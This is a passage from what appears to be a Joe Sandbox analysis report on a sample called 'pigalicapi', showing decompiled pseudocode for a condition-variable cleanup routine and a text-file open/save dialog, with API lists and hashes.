                                                                                                                                                                                                                                                                                                        					L4:
                                                                                                                                                                                                                                                                                                        					return _t79;
                                                                                                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                                                                                                        					_t61 =  *_t75;
                                                                                                                                                                                                                                                                                                        					if(_t61 == 0) {
                                                                                                                                                                                                                                                                                                        						goto L4;
                                                                                                                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                                                                                                                        						if(_t61 == 0xffffffff) {
                                                                                                                                                                                                                                                                                                        							_t35 =  *0x422464; // 0x0
                                                                                                                                                                                                                                                                                                        							__eflags = _t35;
                                                                                                                                                                                                                                                                                                        							if(__eflags == 0) {
                                                                                                                                                                                                                                                                                                        								_v52 = E00415C90;
                                                                                                                                                                                                                                                                                                        								_v56 = 0x10;
                                                                                                                                                                                                                                                                                                        								 *_t83 = "cond_locked_shmem_cond";
                                                                                                                                                                                                                                                                                                        								_t35 = E00414330(__eflags);
                                                                                                                                                                                                                                                                                                        								 *0x422464 = _t35;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							 *_t83 = _t35;
                                                                                                                                                                                                                                                                                                        							_t80 = 0x10;
                                                                                                                                                                                                                                                                                                        							E00414700();
                                                                                                                                                                                                                                                                                                        							__eflags =  *_t75 - 0xffffffff;
                                                                                                                                                                                                                                                                                                        							if( *_t75 == 0xffffffff) {
                                                                                                                                                                                                                                                                                                        								 *_t75 = 0;
                                                                                                                                                                                                                                                                                                        								_t80 = 0;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							_t37 =  *0x422464; // 0x0
                                                                                                                                                                                                                                                                                                        							__eflags = _t37;
                                                                                                                                                                                                                                                                                                        							if(__eflags == 0) {
                                                                                                                                                                                                                                                                                                        								_v52 = E00415C90;
                                                                                                                                                                                                                                                                                                        								_v56 = 0x10;
                                                                                                                                                                                                                                                                                                        								 *_t83 = "cond_locked_shmem_cond";
                                                                                                                                                                                                                                                                                                        								_t37 = E00414330(__eflags);
                                                                                                                                                                                                                                                                                                        								 *0x422464 = _t37;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							 *_t83 = _t37;
                                                                                                                                                                                                                                                                                                        							E00414660();
                                                                                                                                                                                                                                                                                                        							return _t80;
                                                                                                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                                                                                                        							_t40 = _t61 + 0x60;
                                                                                                                                                                                                                                                                                                        							_v36 = _t40;
                                                                                                                                                                                                                                                                                                        							_t41 = _t61 + 0x48;
                                                                                                                                                                                                                                                                                                        							_v32 = _t41;
                                                                                                                                                                                                                                                                                                        							_v56 = _t40;
                                                                                                                                                                                                                                                                                                        							 *_t83 = _t41;
                                                                                                                                                                                                                                                                                                        							_t43 = E00416590( *((intOrPtr*)(_t61 + 0x68)), 0xffffffff, 0);
                                                                                                                                                                                                                                                                                                        							_t79 = _t43;
                                                                                                                                                                                                                                                                                                        							if(_t43 == 0) {
                                                                                                                                                                                                                                                                                                        								_t44 = _t61 + 0x14;
                                                                                                                                                                                                                                                                                                        								_v40 = _t44;
                                                                                                                                                                                                                                                                                                        								 *_t83 = _t44;
                                                                                                                                                                                                                                                                                                        								_t45 = TryEnterCriticalSection(??);
                                                                                                                                                                                                                                                                                                        								_t86 = _t83 - 4;
                                                                                                                                                                                                                                                                                                        								__eflags = _t45;
                                                                                                                                                                                                                                                                                                        								if(_t45 == 0) {
                                                                                                                                                                                                                                                                                                        									_t79 = 0x10;
                                                                                                                                                                                                                                                                                                        									 *_t86 = _v36;
                                                                                                                                                                                                                                                                                                        									E00415CC0( *((intOrPtr*)(_t61 + 0x68)), _v32, 1);
                                                                                                                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                                                                                                                        									__eflags =  *((intOrPtr*)(_t61 + 8)) -  *((intOrPtr*)(_t61 + 0x10));
                                                                                                                                                                                                                                                                                                        									if( *((intOrPtr*)(_t61 + 8)) >  *((intOrPtr*)(_t61 + 0x10))) {
                                                                                                                                                                                                                                                                                                        										L12:
                                                                                                                                                                                                                                                                                                        										 *_t86 = _v36;
                                                                                                                                                                                                                                                                                                        										_t50 = E00415CC0( *((intOrPtr*)(_t61 + 0x68)), _v32, 1);
                                                                                                                                                                                                                                                                                                        										__eflags = _t50;
                                                                                                                                                                                                                                                                                                        										_t79 =  ==  ? 0x10 : _t50;
                                                                                                                                                                                                                                                                                                        										 *_t86 = _v40;
                                                                                                                                                                                                                                                                                                        										LeaveCriticalSection(??);
                                                                                                                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                                                                                                                        										_t79 =  *(_t61 + 4);
                                                                                                                                                                                                                                                                                                        										__eflags = _t79;
                                                                                                                                                                                                                                                                                                        										if(_t79 == 0) {
                                                                                                                                                                                                                                                                                                        											 *_t75 = 0;
                                                                                                                                                                                                                                                                                                        											 *_t86 = _v36;
                                                                                                                                                                                                                                                                                                        											E00415CC0( *((intOrPtr*)(_t61 + 0x68)), _v32, 1);
                                                                                                                                                                                                                                                                                                        											 *_t86 =  *((intOrPtr*)(_t61 + 0x64));
                                                                                                                                                                                                                                                                                                        											CloseHandle(??);
                                                                                                                                                                                                                                                                                                        											_t88 = _t86 - 4;
                                                                                                                                                                                                                                                                                                        											 *_t88 =  *((intOrPtr*)(_t61 + 0x68));
                                                                                                                                                                                                                                                                                                        											CloseHandle(??);
                                                                                                                                                                                                                                                                                                        											_t77 = _v40;
                                                                                                                                                                                                                                                                                                        											_t89 = _t88 - 4;
                                                                                                                                                                                                                                                                                                        											 *_t89 = _t77;
                                                                                                                                                                                                                                                                                                        											LeaveCriticalSection(??);
                                                                                                                                                                                                                                                                                                        											_t90 = _t89 - 4;
                                                                                                                                                                                                                                                                                                        											 *_t90 = _t77;
                                                                                                                                                                                                                                                                                                        											DeleteCriticalSection(??);
                                                                                                                                                                                                                                                                                                        											_t91 = _t90 - 4;
                                                                                                                                                                                                                                                                                                        											 *_t91 = _v32;
                                                                                                                                                                                                                                                                                                        											DeleteCriticalSection(??);
                                                                                                                                                                                                                                                                                                        											_t92 = _t91 - 4;
                                                                                                                                                                                                                                                                                                        											 *_t92 = _t61 + 0x2c;
                                                                                                                                                                                                                                                                                                        											DeleteCriticalSection(??);
                                                                                                                                                                                                                                                                                                        											 *_t61 = 0xc0deadbf;
                                                                                                                                                                                                                                                                                                        											 *((intOrPtr*)(_t92 - 4)) = _t61;
                                                                                                                                                                                                                                                                                                        											free(??);
                                                                                                                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                                                                                                                        											goto L12;
                                                                                                                                                                                                                                                                                                        										}
                                                                                                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							goto L4;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        			}






























                                                                                                                                                                                                                                                                                                        0x00416645
                                                                                                                                                                                                                                                                                                        0x0041664b
                                                                                                                                                                                                                                                                                                        0x0041664e
                                                                                                                                                                                                                                                                                                        0x00416653
                                                                                                                                                                                                                                                                                                        0x0041668c
                                                                                                                                                                                                                                                                                                        0x00416695
                                                                                                                                                                                                                                                                                                        0x00416655
                                                                                                                                                                                                                                                                                                        0x00416655
                                                                                                                                                                                                                                                                                                        0x00416659
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0041665b
                                                                                                                                                                                                                                                                                                        0x0041665e
                                                                                                                                                                                                                                                                                                        0x00416696
                                                                                                                                                                                                                                                                                                        0x0041669b
                                                                                                                                                                                                                                                                                                        0x0041669d
                                                                                                                                                                                                                                                                                                        0x00416806
                                                                                                                                                                                                                                                                                                        0x0041680e
                                                                                                                                                                                                                                                                                                        0x00416816
                                                                                                                                                                                                                                                                                                        0x0041681d
                                                                                                                                                                                                                                                                                                        0x00416822
                                                                                                                                                                                                                                                                                                        0x00416822
                                                                                                                                                                                                                                                                                                        0x004166a3
                                                                                                                                                                                                                                                                                                        0x004166a6
                                                                                                                                                                                                                                                                                                        0x004166ab
                                                                                                                                                                                                                                                                                                        0x004166b0
                                                                                                                                                                                                                                                                                                        0x004166b3
                                                                                                                                                                                                                                                                                                        0x004167d0
                                                                                                                                                                                                                                                                                                        0x004167d6
                                                                                                                                                                                                                                                                                                        0x004167d6
                                                                                                                                                                                                                                                                                                        0x004166b9
                                                                                                                                                                                                                                                                                                        0x004166be
                                                                                                                                                                                                                                                                                                        0x004166c0
                                                                                                                                                                                                                                                                                                        0x004167e0
                                                                                                                                                                                                                                                                                                        0x004167e8
                                                                                                                                                                                                                                                                                                        0x004167f0
                                                                                                                                                                                                                                                                                                        0x004167f7
                                                                                                                                                                                                                                                                                                        0x004167fc
                                                                                                                                                                                                                                                                                                        0x004167fc
                                                                                                                                                                                                                                                                                                        0x004166c6
                                                                                                                                                                                                                                                                                                        0x004166c9
                                                                                                                                                                                                                                                                                                        0x004166d7
                                                                                                                                                                                                                                                                                                        0x00416660
                                                                                                                                                                                                                                                                                                        0x00416660
                                                                                                                                                                                                                                                                                                        0x00416665
                                                                                                                                                                                                                                                                                                        0x00416668
                                                                                                                                                                                                                                                                                                        0x0041666d
                                                                                                                                                                                                                                                                                                        0x00416673
                                                                                                                                                                                                                                                                                                        0x00416679
                                                                                                                                                                                                                                                                                                        0x00416681
                                                                                                                                                                                                                                                                                                        0x00416688
                                                                                                                                                                                                                                                                                                        0x0041668a
                                                                                                                                                                                                                                                                                                        0x004166d8
                                                                                                                                                                                                                                                                                                        0x004166db
                                                                                                                                                                                                                                                                                                        0x004166de
                                                                                                                                                                                                                                                                                                        0x004166e1
                                                                                                                                                                                                                                                                                                        0x004166e7
                                                                                                                                                                                                                                                                                                        0x004166ea
                                                                                                                                                                                                                                                                                                        0x004166ec
                                                                                                                                                                                                                                                                                                        0x00416736
                                                                                                                                                                                                                                                                                                        0x00416740
                                                                                                                                                                                                                                                                                                        0x00416748
                                                                                                                                                                                                                                                                                                        0x004166ee
                                                                                                                                                                                                                                                                                                        0x004166f1
                                                                                                                                                                                                                                                                                                        0x004166f4
                                                                                                                                                                                                                                                                                                        0x004166fd
                                                                                                                                                                                                                                                                                                        0x00416708
                                                                                                                                                                                                                                                                                                        0x0041670e
                                                                                                                                                                                                                                                                                                        0x00416713
                                                                                                                                                                                                                                                                                                        0x0041671c
                                                                                                                                                                                                                                                                                                        0x00416722
                                                                                                                                                                                                                                                                                                        0x00416725
                                                                                                                                                                                                                                                                                                        0x004166f6
                                                                                                                                                                                                                                                                                                        0x004166f6
                                                                                                                                                                                                                                                                                                        0x004166f9
                                                                                                                                                                                                                                                                                                        0x004166fb
                                                                                                                                                                                                                                                                                                        0x0041675a
                                                                                                                                                                                                                                                                                                        0x00416763
                                                                                                                                                                                                                                                                                                        0x00416769
                                                                                                                                                                                                                                                                                                        0x00416777
                                                                                                                                                                                                                                                                                                        0x0041677a
                                                                                                                                                                                                                                                                                                        0x0041677f
                                                                                                                                                                                                                                                                                                        0x00416782
                                                                                                                                                                                                                                                                                                        0x00416785
                                                                                                                                                                                                                                                                                                        0x00416787
                                                                                                                                                                                                                                                                                                        0x0041678a
                                                                                                                                                                                                                                                                                                        0x0041678d
                                                                                                                                                                                                                                                                                                        0x00416790
                                                                                                                                                                                                                                                                                                        0x00416796
                                                                                                                                                                                                                                                                                                        0x00416799
                                                                                                                                                                                                                                                                                                        0x004167a2
                                                                                                                                                                                                                                                                                                        0x004167a7
                                                                                                                                                                                                                                                                                                        0x004167aa
                                                                                                                                                                                                                                                                                                        0x004167ad
                                                                                                                                                                                                                                                                                                        0x004167b2
                                                                                                                                                                                                                                                                                                        0x004167b5
                                                                                                                                                                                                                                                                                                        0x004167b8
                                                                                                                                                                                                                                                                                                        0x004167ba
                                                                                                                                                                                                                                                                                                        0x004167c3
                                                                                                                                                                                                                                                                                                        0x004167c6
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x004166fb
                                                                                                                                                                                                                                                                                                        0x004166f4
                                                                                                                                                                                                                                                                                                        0x004166ec
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0041668a
                                                                                                                                                                                                                                                                                                        0x0041665e
                                                                                                                                                                                                                                                                                                        0x00416659

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • TryEnterCriticalSection.KERNEL32 ref: 004166E1
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32 ref: 00416725
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32 ref: 0041677A
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32 ref: 00416785
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32 ref: 00416790
                                                                                                                                                                                                                                                                                                        • DeleteCriticalSection.KERNEL32 ref: 004167A2
                                                                                                                                                                                                                                                                                                        • DeleteCriticalSection.KERNEL32 ref: 004167AD
                                                                                                                                                                                                                                                                                                        • DeleteCriticalSection.KERNEL32 ref: 004167B8
                                                                                                                                                                                                                                                                                                        • free.MSVCRT ref: 004167C6
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00416590: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,0040EF30,0040EF44,?,?,004168E7,?,?,?,?,0041586E), ref: 004165AE
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00416590: InterlockedDecrement.KERNEL32 ref: 004165B9
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00416590: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,0040EF30,0040EF44,?,?,004168E7), ref: 004165D3
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CriticalSection$DeleteLeave$CloseEnterHandle$DecrementInterlockedfree
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2614691852-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 10d2e47235c33a10f307eab6fba7a2750502e1a8a3a0ce621bbac8bbba1721c3
                                                                                                                                                                                                                                                                                                        • Instruction ID: 1c191d0dd0adc589239668a28d7ae89f025c8aa7f2191fcd58db01b9eefcd2da
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 10d2e47235c33a10f307eab6fba7a2750502e1a8a3a0ce621bbac8bbba1721c3
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 42514AB1A043048FCB10EF69D5842AEBBF4EF84310F52493AD85997355E778E885CB9A
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 35%
                                                                                                                                                                                                                                                                                                        			E00401879(struct HWND__* _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                                                                                                                                        				char _v28;
                                                                                                                                                                                                                                                                                                        				char _v288;
                                                                                                                                                                                                                                                                                                        				char* _v316;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v324;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v344;
                                                                                                                                                                                                                                                                                                        				char* _v348;
                                                                                                                                                                                                                                                                                                        				char* _v364;
                                                                                                                                                                                                                                                                                                        				struct HWND__* _v372;
                                                                                                                                                                                                                                                                                                        				void _v376;
                                                                                                                                                                                                                                                                                                        				char _v400;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v404;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v408;
                                                                                                                                                                                                                                                                                                        				int _v428;
                                                                                                                                                                                                                                                                                                        				char _v432;
                                                                                                                                                                                                                                                                                                        				int _v436;
                                                                                                                                                                                                                                                                                                        				void* _v452;
                                                                                                                                                                                                                                                                                                        				void* _v456;
                                                                                                                                                                                                                                                                                                        				char _v460;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v464;
                                                                                                                                                                                                                                                                                                        				char* _v468;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t55;
                                                                                                                                                                                                                                                                                                        				signed int _t64;
                                                                                                                                                                                                                                                                                                        				int _t66;
                                                                                                                                                                                                                                                                                                        				struct HWND__* _t72;
                                                                                                                                                                                                                                                                                                        				signed int _t80;
                                                                                                                                                                                                                                                                                                        				struct HWND__* _t84;
                                                                                                                                                                                                                                                                                                        				void* _t92;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t93;
                                                                                                                                                                                                                                                                                                        				void* _t94;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t96;
                                                                                                                                                                                                                                                                                                        				void* _t98;
                                                                                                                                                                                                                                                                                                        				struct HWND__** _t99;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_t93 = _t92 - 0x1bc;
                                                                                                                                                                                                                                                                                                        				_v408 = E00418AA0;
                                                                                                                                                                                                                                                                                                        				_v404 = 0x419100;
                                                                                                                                                                                                                                                                                                        				_t55 =  &_v400;
                                                                                                                                                                                                                                                                                                        				_t90 =  &_v28;
                                                                                                                                                                                                                                                                                                        				 *_t55 =  &_v28;
                                                                                                                                                                                                                                                                                                        				_t91 = E00401A65;
                                                                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t55 + 4)) = E00401A65;
                                                                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t55 + 8)) = _t93;
                                                                                                                                                                                                                                                                                                        				E0040E1A0( &_v28, E00401A65,  &_v432);
                                                                                                                                                                                                                                                                                                        				memset( &_v376, 0, 0x58);
                                                                                                                                                                                                                                                                                                        				_v288 = 0;
                                                                                                                                                                                                                                                                                                        				_v376 = 0x58;
                                                                                                                                                                                                                                                                                                        				_v372 = _a4;
                                                                                                                                                                                                                                                                                                        				_v364 = "Text Files (*.txt)";
                                                                                                                                                                                                                                                                                                        				_v348 =  &_v288;
                                                                                                                                                                                                                                                                                                        				_v344 = 0x104;
                                                                                                                                                                                                                                                                                                        				_v316 = "txt";
                                                                                                                                                                                                                                                                                                        				if(_a8 == 0) {
                                                                                                                                                                                                                                                                                                        					_v324 = 0x81004;
                                                                                                                                                                                                                                                                                                        					_v460 =  &_v376;
                                                                                                                                                                                                                                                                                                        					_v428 = 1;
                                                                                                                                                                                                                                                                                                        					_t64 = GetOpenFileNameA(??);
                                                                                                                                                                                                                                                                                                        					_t94 = _t93 - 4;
                                                                                                                                                                                                                                                                                                        					if((_t64 & 0xffffff00 | GetOpenFileNameA != 0x00000000) == 0) {
                                                                                                                                                                                                                                                                                                        						goto L7;
                                                                                                                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                                                                                                                        						_t72 = GetDlgItem(_a4, 0x3e9);
                                                                                                                                                                                                                                                                                                        						_t96 = _t94 - 8;
                                                                                                                                                                                                                                                                                                        						_t91 =  &_v288;
                                                                                                                                                                                                                                                                                                        						_v468 =  &_v288;
                                                                                                                                                                                                                                                                                                        						 *_t96 = _t72;
                                                                                                                                                                                                                                                                                                        						if((E00401520() & 0xffffff00 | _t73 == 0x00000000) == 0) {
                                                                                                                                                                                                                                                                                                        							goto L7;
                                                                                                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                                                                                                        							_v460 = 0x30;
                                                                                                                                                                                                                                                                                                        							_v464 = "Error";
                                                                                                                                                                                                                                                                                                        							_v468 = "Load of file failed.";
                                                                                                                                                                                                                                                                                                        							 *_t96 = _a4;
                                                                                                                                                                                                                                                                                                        							MessageBoxA(??, ??, ??, ??);
                                                                                                                                                                                                                                                                                                        							_t66 = 0;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                                                                                                        					_v324 = 0x80806;
                                                                                                                                                                                                                                                                                                        					_v460 =  &_v376;
                                                                                                                                                                                                                                                                                                        					_v428 = 1;
                                                                                                                                                                                                                                                                                                        					_t80 = GetSaveFileNameA(??);
                                                                                                                                                                                                                                                                                                        					_t98 = _t93 - 4;
                                                                                                                                                                                                                                                                                                        					if((_t80 & 0xffffff00 | GetSaveFileNameA != 0x00000000) == 0) {
                                                                                                                                                                                                                                                                                                        						L7:
                                                                                                                                                                                                                                                                                                        						_t66 = 1;
                                                                                                                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                                                                                                                        						_t84 = GetDlgItem(_a4, 0x3e9);
                                                                                                                                                                                                                                                                                                        						_t99 = _t98 - 8;
                                                                                                                                                                                                                                                                                                        						_t91 =  &_v288;
                                                                                                                                                                                                                                                                                                        						_v468 =  &_v288;
                                                                                                                                                                                                                                                                                                        						 *_t99 = _t84;
                                                                                                                                                                                                                                                                                                        						if((E004016D2() & 0xffffff00 | _t85 == 0x00000000) == 0) {
                                                                                                                                                                                                                                                                                                        							goto L7;
                                                                                                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                                                                                                        							_v460 = 0x30;
                                                                                                                                                                                                                                                                                                        							_v464 = "Error";
                                                                                                                                                                                                                                                                                                        							_v468 = "Save file failed.";
                                                                                                                                                                                                                                                                                                        							 *_t99 = _a4;
                                                                                                                                                                                                                                                                                                        							MessageBoxA(??, ??, ??, ??);
                                                                                                                                                                                                                                                                                                        							_t66 = 0;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				_v436 = _t66;
                                                                                                                                                                                                                                                                                                        				E0040E320(_t90, _t91,  &_v432);
                                                                                                                                                                                                                                                                                                        				return _v436;
                                                                                                                                                                                                                                                                                                        			}




































                                                                                                                                                                                                                                                                                                        0x0040187f
                                                                                                                                                                                                                                                                                                        0x00401885
                                                                                                                                                                                                                                                                                                        0x0040188f
                                                                                                                                                                                                                                                                                                        0x00401899
                                                                                                                                                                                                                                                                                                        0x0040189f
                                                                                                                                                                                                                                                                                                        0x004018a2
                                                                                                                                                                                                                                                                                                        0x004018a4
                                                                                                                                                                                                                                                                                                        0x004018a9
                                                                                                                                                                                                                                                                                                        0x004018ac
                                                                                                                                                                                                                                                                                                        0x004018b8
                                                                                                                                                                                                                                                                                                        0x004018d6
                                                                                                                                                                                                                                                                                                        0x004018db
                                                                                                                                                                                                                                                                                                        0x004018e2
                                                                                                                                                                                                                                                                                                        0x004018ef
                                                                                                                                                                                                                                                                                                        0x004018f5
                                                                                                                                                                                                                                                                                                        0x00401905
                                                                                                                                                                                                                                                                                                        0x0040190b
                                                                                                                                                                                                                                                                                                        0x00401915
                                                                                                                                                                                                                                                                                                        0x00401923
                                                                                                                                                                                                                                                                                                        0x004019c6
                                                                                                                                                                                                                                                                                                        0x004019d6
                                                                                                                                                                                                                                                                                                        0x004019de
                                                                                                                                                                                                                                                                                                        0x004019e8
                                                                                                                                                                                                                                                                                                        0x004019ea
                                                                                                                                                                                                                                                                                                        0x004019f4
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x004019f6
                                                                                                                                                                                                                                                                                                        0x00401a09
                                                                                                                                                                                                                                                                                                        0x00401a0b
                                                                                                                                                                                                                                                                                                        0x00401a0e
                                                                                                                                                                                                                                                                                                        0x00401a14
                                                                                                                                                                                                                                                                                                        0x00401a18
                                                                                                                                                                                                                                                                                                        0x00401a27
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00401a29
                                                                                                                                                                                                                                                                                                        0x00401a29
                                                                                                                                                                                                                                                                                                        0x00401a31
                                                                                                                                                                                                                                                                                                        0x00401a39
                                                                                                                                                                                                                                                                                                        0x00401a44
                                                                                                                                                                                                                                                                                                        0x00401a4c
                                                                                                                                                                                                                                                                                                        0x00401a51
                                                                                                                                                                                                                                                                                                        0x00401a51
                                                                                                                                                                                                                                                                                                        0x00401a27
                                                                                                                                                                                                                                                                                                        0x00401929
                                                                                                                                                                                                                                                                                                        0x00401929
                                                                                                                                                                                                                                                                                                        0x00401939
                                                                                                                                                                                                                                                                                                        0x00401941
                                                                                                                                                                                                                                                                                                        0x0040194b
                                                                                                                                                                                                                                                                                                        0x0040194d
                                                                                                                                                                                                                                                                                                        0x00401957
                                                                                                                                                                                                                                                                                                        0x00401a58
                                                                                                                                                                                                                                                                                                        0x00401a58
                                                                                                                                                                                                                                                                                                        0x0040195d
                                                                                                                                                                                                                                                                                                        0x00401970
                                                                                                                                                                                                                                                                                                        0x00401972
                                                                                                                                                                                                                                                                                                        0x00401975
                                                                                                                                                                                                                                                                                                        0x0040197b
                                                                                                                                                                                                                                                                                                        0x0040197f
                                                                                                                                                                                                                                                                                                        0x0040198e
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00401994
                                                                                                                                                                                                                                                                                                        0x00401994
                                                                                                                                                                                                                                                                                                        0x0040199c
                                                                                                                                                                                                                                                                                                        0x004019a4
                                                                                                                                                                                                                                                                                                        0x004019af
                                                                                                                                                                                                                                                                                                        0x004019b7
                                                                                                                                                                                                                                                                                                        0x004019bc
                                                                                                                                                                                                                                                                                                        0x004019bc
                                                                                                                                                                                                                                                                                                        0x0040198e
                                                                                                                                                                                                                                                                                                        0x00401957
                                                                                                                                                                                                                                                                                                        0x00401a5d
                                                                                                                                                                                                                                                                                                        0x00401a89
                                                                                                                                                                                                                                                                                                        0x00401a9b

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: memset
                                                                                                                                                                                                                                                                                                        • String ID: 0$Error$Load of file failed.$Save file failed.$Text Files (*.txt)$X$X$txt
                                                                                                                                                                                                                                                                                                        • API String ID: 2221118986-4035221783
                                                                                                                                                                                                                                                                                                        • Opcode ID: 123245c011ebb60f00026e2333eb700c91498b7a70da1c347f03b1a05bee33b3
                                                                                                                                                                                                                                                                                                        • Instruction ID: 791b6864530678cd1946ed1b94040bc6d96a798256f3efdc208ed694a97620fc
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 123245c011ebb60f00026e2333eb700c91498b7a70da1c347f03b1a05bee33b3
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 47510AB0905308DFDB10EF25C9847C9BBF4AF45344F4084AAE89CAB351D7789A89CF86
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 58%
                                                                                                                                                                                                                                                                                                        			E0040C550(signed int __eax, intOrPtr __ecx, intOrPtr __edx) {
